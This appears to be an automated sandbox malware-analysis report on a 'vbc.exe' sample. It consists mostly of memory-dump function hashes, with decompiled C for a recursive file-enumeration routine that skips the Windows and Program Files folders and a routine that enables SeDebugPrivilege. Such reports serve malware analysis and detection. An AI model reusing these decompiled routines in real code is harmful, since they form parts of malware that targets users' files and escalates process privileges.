Instruction ID: 2a63466b2c4d0b784440d5a364a9eb17e316aaf0ae25b5718dfc94abe883bdfb
Opcode Fuzzy Hash: bd5b2ed105b5825fa8965d4aad1ec497105cb33172efd27d0d758b39f976a433
Instruction Fuzzy Hash: 69E0E574D0121CAFCF40EFE8D8456AEBBB5FB48300F1086AAE868A7321D7705A50DF94

Uniqueness

Uniqueness Score: -1.00%

Function 006E5B61, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee57d34b92967d25329c14eb29e500032cf9e8fd8f83a67332484479896eb38
Instruction ID: f35dc4d640ebc17957faa259bf3a231b30e1fc8caa128e5541c2b3e8a8cce45a
Opcode Fuzzy Hash: cee57d34b92967d25329c14eb29e500032cf9e8fd8f83a67332484479896eb38
Instruction Fuzzy Hash: E5E01A35E16389DFCB44EFF9E0C44EDBBB1BB45321F24162AA416EB295DA348482CF40

Uniqueness

Uniqueness Score: -1.00%

Function 006E0771, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ac904718f938b6f6cc3c424e4095e6362ad75b36d5870d028c10ba733cd3f8
Instruction ID: e34e7fc3e1a614d0e2080384d3aeb8811ae1840348d5c0640cb9bd6fddb36ff1
Opcode Fuzzy Hash: 13ac904718f938b6f6cc3c424e4095e6362ad75b36d5870d028c10ba733cd3f8
Instruction Fuzzy Hash: E7E09A30D092889FCB62DFB8981428CBFF0AB45304F0581EBC818E7262E7385A84CB41

Uniqueness

Uniqueness Score: -1.00%

Function 006E07C8, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f138584cfcb2efc8470747705af0b9f43b82b41bb98afbfee926a775b397ef5d
Instruction ID: 03b0b4b56fc1ab6a794a34589132f4e90c2415e6c867e6c05595ddc6639e4f2a
Opcode Fuzzy Hash: f138584cfcb2efc8470747705af0b9f43b82b41bb98afbfee926a775b397ef5d
Instruction Fuzzy Hash: C1E09274E11208EFCB80DFA9D848A9CBBF8EB08715F1081EAD818D7361E634AA40CF41

Uniqueness

Uniqueness Score: -1.00%

Function 006E07C0, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5104e2ab47b14bef6d956a14760e01a04d73be6e3c1b53fe9259bcc7a1206cce
Instruction ID: 4fe2fc7fd195f7e5f7b0c8e5ff20892c5e9a12987412c0ea9d701048e1b3bf3d
Opcode Fuzzy Hash: 5104e2ab47b14bef6d956a14760e01a04d73be6e3c1b53fe9259bcc7a1206cce
Instruction Fuzzy Hash: B2E0EE74E21208DFCB80DFA9C98969CBBF4EB08305F5080AAD818E3320E734AA54CF40

Uniqueness

Uniqueness Score: -1.00%

Function 006E371E, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208331bb395692b136a9316055b07c2cb9a7d430bd6fd17beea6fcac14a8f2d3
Instruction ID: 9ca03041d21b7f994ebc5db99652788df250adeac83830f904bd198820fc5743
Opcode Fuzzy Hash: 208331bb395692b136a9316055b07c2cb9a7d430bd6fd17beea6fcac14a8f2d3
Instruction Fuzzy Hash: 97E0E5B8D0A289CFDB05CBA9D44C6ACBBF1BB09301B1440AAD81AD3351DA748A01CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006E0780, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2baa31a522976d144d3b0d39f69c2bb8a67a0bd542a335ef08c9895b061ae6c8
Instruction ID: 5f02289eadd79425b3f0e004e37853a5ffe9f464725a5659666d639bf1484439
Opcode Fuzzy Hash: 2baa31a522976d144d3b0d39f69c2bb8a67a0bd542a335ef08c9895b061ae6c8
Instruction Fuzzy Hash: 00E0E274D01208AFCB90EFF9D84429DBBF8AB48304F1085AA9928A3350EB345A80CF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 006EBEDE, Relevance: 5.5, Strings: 3, Instructions: 1795COMMON

Download Yara Rule

Strings

TVNm, xrefs: 006EBF73
@2Nm, xrefs: 006EBFB1
g~:, xrefs: 006ED75E

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: @2Nm$TVNm$g~:
API String ID: 0-3703172786
Opcode ID: 7f8343c7eba1366925e3f1be20be573f9030abb2209a71207b6c59b2db85a708
Instruction ID: b7e8d5f2824b8e530764926edbc486bcd9b99dab682c749116ec508d444efa01
Opcode Fuzzy Hash: 7f8343c7eba1366925e3f1be20be573f9030abb2209a71207b6c59b2db85a708
Instruction Fuzzy Hash: 35039D7A610114EFDB4A9F94C944E95BBB2FF4D314B0A80D8E6099F276C732E961EF40

Uniqueness

Uniqueness Score: -1.00%

Function 00379028, Relevance: 4.0, Strings: 3, Instructions: 245COMMON

Download Yara Rule

Strings

u*U, xrefs: 003794E1
u*U, xrefs: 003794DA
zB[!, xrefs: 00379481

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: zB[!$u*U$u*U
API String ID: 0-3291643977
Opcode ID: 149b83aa4ce160f3d732efa1aae00c7097bb7d5c702e0fc1030a1b82f2c01954
Instruction ID: 425341f26994dd3a8acf5030b316af63e44a9a34375af3dd56f10912f8d5b008
Opcode Fuzzy Hash: 149b83aa4ce160f3d732efa1aae00c7097bb7d5c702e0fc1030a1b82f2c01954
Instruction Fuzzy Hash: 3FB16B74E101698FCB24DF99C5806AEFBF6BF89304F24C66AD809A7306D7359941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00374008, Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

fy|s, xrefs: 003741CF
Y, xrefs: 00374050

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: Y$fy|s
API String ID: 0-2716441636
Opcode ID: 22f5a0616885fbec8a60676e290ac26652a8eb432263457cef4f3d1d8f294ddb
Instruction ID: daa04d54f8b27785525d9c515baf0a733a43ddd7829423da0b4cbc3703a5c4ec
Opcode Fuzzy Hash: 22f5a0616885fbec8a60676e290ac26652a8eb432263457cef4f3d1d8f294ddb
Instruction Fuzzy Hash: 8C81DF74A14219CFCB45CFA9C5849AEFBF5FF88310F24956AE419AB320D334AA42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00374BC0, Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

}F`, xrefs: 00374CA7
}F`, xrefs: 00374C99

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: }F`$}F`
API String ID: 0-1963587383
Opcode ID: c482b750cc38e2d430fbf34024c997a27d1bb0ff5eace9c7de2c8284cb3ef84b
Instruction ID: 59426c41a638f4884b5318113a0b3611c63d071adcc0ac37a624f326b195b3b7
Opcode Fuzzy Hash: c482b750cc38e2d430fbf34024c997a27d1bb0ff5eace9c7de2c8284cb3ef84b
Instruction Fuzzy Hash: CE71F6B4D1521ADFCB65CF99C5808AEFBB6FF88300F24C519D419AB215D338A982CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00374BB1, Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

}F`, xrefs: 00374CA7

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: }F`
API String ID: 0-2664959885
Opcode ID: 37c3237835dab8262066cf5e097178cbfebd57283035c12326e35d5979f1c644
Instruction ID: a7d081fcc12c7f30699cfa3faa491998ac57bd9b18a128cc3f167780cdc20449
Opcode Fuzzy Hash: 37c3237835dab8262066cf5e097178cbfebd57283035c12326e35d5979f1c644
Instruction Fuzzy Hash: 49610974E0521ADFCB16CFA9C5808AEFBB5FF88300F24C55AD419A7215D334A982CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00375850, Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

@K, xrefs: 00375958

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: @K
API String ID: 0-3806838433
Opcode ID: 2f47bc1cfe48b70ba76b940fcd58668cea44bc0c22e8d9bdbcc38666f78993db
Instruction ID: 04156f003a3ee8a900ee213010abcbde9aeef8b841a3877959fcdcfd1cdbacf1
Opcode Fuzzy Hash: 2f47bc1cfe48b70ba76b940fcd58668cea44bc0c22e8d9bdbcc38666f78993db
Instruction Fuzzy Hash: 34517871E056598BEB68CF6BCD4469EFBF3AFC8300F14C1BA950CA6225DB341A858F11

Uniqueness

Uniqueness Score: -1.00%

Function 006EDCA8, Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

ZyT, xrefs: 006EDD76

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: ZyT
API String ID: 0-3628694178
Opcode ID: fda54be3a72041a520083c945d5f8a7719b9b56544cd80bbb0dc7fa16247f65f
Instruction ID: d7f5e1f4fa0ce08a80652b78f22a0e7b21d8ab765ad0c8f7f189f4a7cee42b71
Opcode Fuzzy Hash: fda54be3a72041a520083c945d5f8a7719b9b56544cd80bbb0dc7fa16247f65f
Instruction Fuzzy Hash: AF41E275F4524AAFC744CEAAC8051AEB7F3ABD9340B64D9A5911ADF314E338CA038F14

Uniqueness

Uniqueness Score: -1.00%

Function 006EDC98, Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

ZyT, xrefs: 006EDD76

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: ZyT
API String ID: 0-3628694178
Opcode ID: e27cad42a65572fce2ec0eb24cc5a9ce57339c6b5a13c4359a74fb15e7aa5f98
Instruction ID: ebb12a711a5fdac28249201f15e8cf1d72de1a241c55dda83f0efd1c01083ae2
Opcode Fuzzy Hash: e27cad42a65572fce2ec0eb24cc5a9ce57339c6b5a13c4359a74fb15e7aa5f98
Instruction Fuzzy Hash: 9D41D3B4F4524A9FC744CEBA88055AE7BF3ABD8340B64D9A99116DF314E378C9438F14

Uniqueness

Uniqueness Score: -1.00%

Function 00374ED0, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24aa038aa3b03902c3939539e780e4ab1b8decd756efed2dabd1f95145d7e2d
Instruction ID: 8d26f0ef8ee43ede737fb3a7a5bc8d63f00b4ea6f5f2bb223a7f86f7218ec275
Opcode Fuzzy Hash: c24aa038aa3b03902c3939539e780e4ab1b8decd756efed2dabd1f95145d7e2d
Instruction Fuzzy Hash: 8E7158B4E0421ADFCB15CFA5D4806AEFBB5FF89300F24C55AD418AB614D338AA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 003782D8, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3da28cb7aa050cee7e9f8ed3b34040ae5a34d43edd9215a4de51a7bd03fe06
Instruction ID: 73e300e01864bfc3a8cc9f15903e42657742aedd6a1e964a0087fa9f6eae7a61
Opcode Fuzzy Hash: 3d3da28cb7aa050cee7e9f8ed3b34040ae5a34d43edd9215a4de51a7bd03fe06
Instruction Fuzzy Hash: 15518E74E10219CBDB25CFA9D9809AEFBF6BF88304F24C169D409A7315DB349A41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00375458, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42edfa3fa513a0806ddcb6b8b4206f79f464f2cf1261d2471143e1f79effb2f0
Instruction ID: c5ce0aee6479859ed74a26ddf37fb1add76c57fcfa37e80f95098f4d1f79799d
Opcode Fuzzy Hash: 42edfa3fa513a0806ddcb6b8b4206f79f464f2cf1261d2471143e1f79effb2f0
Instruction Fuzzy Hash: A251D370E116198FCB08CF9AC9809DEFBF2BF88311F64842AD419B7314D3789A418FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00375448, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77ff8b53ed1b7b110a2c75c6a051627c870c786220f4909c0bf124326fafec4
Instruction ID: df9e6bfa4a066c3f84babc453242016e9d9ce448b4443788423b39b12eac17c7
Opcode Fuzzy Hash: b77ff8b53ed1b7b110a2c75c6a051627c870c786220f4909c0bf124326fafec4
Instruction Fuzzy Hash: 6851D370E056198FCB09CFAAC9805DEBBF2BF89311F24C42AD419B7324D3789A418F65

Uniqueness

Uniqueness Score: -1.00%

Function 00375648, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52288b1e188e07105c8bc8949d6443ece0234bed0cb0f746aea624ef8378e1b4
Instruction ID: 526cafad2fe44646158817ce7069dd816aea11fa94d5d6f3025aba94d1910a3b
Opcode Fuzzy Hash: 52288b1e188e07105c8bc8949d6443ece0234bed0cb0f746aea624ef8378e1b4
Instruction Fuzzy Hash: 8F5118B0E1560ACFCB59CFAAC5814AEFBF6BF89300F64D46AC409B7214D3759A418F94

Uniqueness

Uniqueness Score: -1.00%

Function 00375268, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5db2782ee861111867c126e78fa29d983c9ae6e0c335f0eb2de955f068a1480
Instruction ID: de233b41b4cd190a7e628cfd4f0c251937ec026e77a4c13f2c75a1d0c5aaa649
Opcode Fuzzy Hash: e5db2782ee861111867c126e78fa29d983c9ae6e0c335f0eb2de955f068a1480
Instruction Fuzzy Hash: F841F474E006099BDB19CFAAC9815EEFBF6BF88300F24C46AC419B7251D7759A418B64

Uniqueness

Uniqueness Score: -1.00%

Function 006E0022, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45df138bbdb548347da6e5734da1fcb7a4cb79a70105dc82ef40b7ad91ea7735
Instruction ID: 58afab7ff857ef93f354a8ee1a42f427cf7ebb5ce9a8a9b1e0e9953d5164f331
Opcode Fuzzy Hash: 45df138bbdb548347da6e5734da1fcb7a4cb79a70105dc82ef40b7ad91ea7735
Instruction Fuzzy Hash: 43213170E057988FD709CF6A895069EBFF3AFC9300F18C0ABD448E7266D6345945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 006E0048, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b5a6ccc5f4e932af6ed4ae45f414311fda94fc31c59c9c98f9a16e87f89c3e
Instruction ID: e8e2881d20ed7b58b000608a808cf86c9e31b0c32633da176bfc6704dab86605
Opcode Fuzzy Hash: 16b5a6ccc5f4e932af6ed4ae45f414311fda94fc31c59c9c98f9a16e87f89c3e
Instruction Fuzzy Hash: D7111771E116199BEB08CFABD9406DEFBF7ABC8300F14C06AD408A7214DA705A528B51

Uniqueness

Uniqueness Score: -1.00%

Function 006E60A9, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b293ff400db0c2561ecf6b4bc9936e9a3cfbab8dc324554a7f0f4fe3e5d045a7
Instruction ID: 239f8e823dfb9b09e6f2f69f349ddb51af100a46069d3a50fba3b9d58605abf7
Opcode Fuzzy Hash: b293ff400db0c2561ecf6b4bc9936e9a3cfbab8dc324554a7f0f4fe3e5d045a7
Instruction Fuzzy Hash: 5E11C971D056489BDB08CFABD8446DEFAF7AFC9340F14D079E914AB265EB3045028B54

Uniqueness

Uniqueness Score: -1.00%

Function 006E60B8, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648fc51d78e935b8e8ea0428c67d78593a62d8fc46f9f4a04d0fa5833fc7c26b
Instruction ID: accd68d4b01c4ef9985117f2bb33b9bc03fb6c801bae7da97433cb66c356f0a5
Opcode Fuzzy Hash: 648fc51d78e935b8e8ea0428c67d78593a62d8fc46f9f4a04d0fa5833fc7c26b
Instruction Fuzzy Hash: 0211B971E056489BEB08CFABD8405EEFAF7AFD9340F14D039E914B7265DB3045028E54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 3040 Parent PID: 2952 vbc.exeCOMMON

Executed Functions

Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f58
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc4
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8c
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Program Files, xrefs: 00403E01
%s\*, xrefs: 00403D99
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 3fde6c4a7a317932b4cb7643a4a2b0d3a30bf33187a4660f93c72fe85a5a4082
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 3fde6c4a7a317932b4cb7643a4a2b0d3a30bf33187a4660f93c72fe85a5a4082
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}

0x00406512
0x00406514
0x00406522
0x00406524
0x00406530
0x00406534
0x0040653f
0x0040654e
0x00406552
0x0040655a
0x0040655f
0x0040656d
0x00406570
0x00406573
0x0040657a
0x00406589
0x0040658d
0x00406590
0x00406594
0x00000000
0x0040659a
0x004065a1

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
